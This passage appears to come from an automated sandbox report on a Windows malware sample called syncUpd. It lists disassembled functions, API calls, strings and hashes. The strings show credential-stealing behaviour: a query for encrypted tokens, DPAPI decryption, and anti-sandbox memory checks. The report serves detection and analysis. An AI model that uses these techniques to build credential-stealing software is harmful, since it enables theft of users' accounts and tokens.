                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(0071D8C8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • PJr, xrefs: 00409AB2
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                                  • xIr, xrefs: 00409A2E
                                                                                                                                                                                                                                  • xPr, xrefs: 00409A63
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$PJr$xIr$xPr
                                                                                                                                                                                                                                  • API String ID: 2929475105-2642416123
                                                                                                                                                                                                                                  • Opcode ID: 42c24c2bd3098d83908933c1c731d208806978308424b3820254a7636444ccc7
                                                                                                                                                                                                                                  • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42c24c2bd3098d83908933c1c731d208806978308424b3820254a7636444ccc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                    • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                  • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                  • Opcode ID: bd3649e57599b345671a6428ab154346f8b429091021eed7c3f4e2c3f3a892e6
                                                                                                                                                                                                                                  • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd3649e57599b345671a6428ab154346f8b429091021eed7c3f4e2c3f3a892e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                  • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                  • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                  • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                  • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                  • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                  • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                  • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 211194620-0
                                                                                                                                                                                                                                  • Opcode ID: 773f924f19d082114bd1ebf987b99a3e77cfd3a99f58f424b47dbf47f8c8e8f1
                                                                                                                                                                                                                                  • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 773f924f19d082114bd1ebf987b99a3e77cfd3a99f58f424b47dbf47f8c8e8f1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                    • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00724AC8), ref: 0040971B
                                                                                                                                                                                                                                    • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                    • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                    • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                    • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                    • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                    • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                    • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                  • String ID: $DPAPI
                                                                                                                                                                                                                                  • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                  • Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                                  • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1378416451-0
                                                                                                                                                                                                                                  • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                  • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                  • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                  • Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                                  • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                  • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                  • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
